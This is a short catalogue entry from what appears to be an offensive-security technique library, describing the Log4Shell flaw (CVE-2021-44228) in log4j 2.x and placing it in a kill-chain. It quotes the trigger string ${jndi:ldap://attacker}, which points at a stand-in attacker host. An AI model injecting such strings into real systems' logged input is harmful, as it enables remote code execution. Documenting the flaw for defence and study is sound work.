Skip to content
← LibraryTechnique entry
CVE-LOG4SHELLExecution

Log4Shell (CVE-2021-44228)

JNDI lookup in log4j 2.x — ${jndi:ldap://attacker} in any logged user input triggers JNDI resolution → arbitrary class load → RCE.

§ Where this technique fits

CVE-LOG4SHELL is catalogued under the Execution tactic of the offensive-security kill-chain. It appears in 1 approved dossier in the registry, typically at step 2 on average.

§ Dossiers chaining this technique

§ What commonly comes next

  1. 01
    Exploit Public-Facing Application
    T1190 · Initial Access
    seen 1×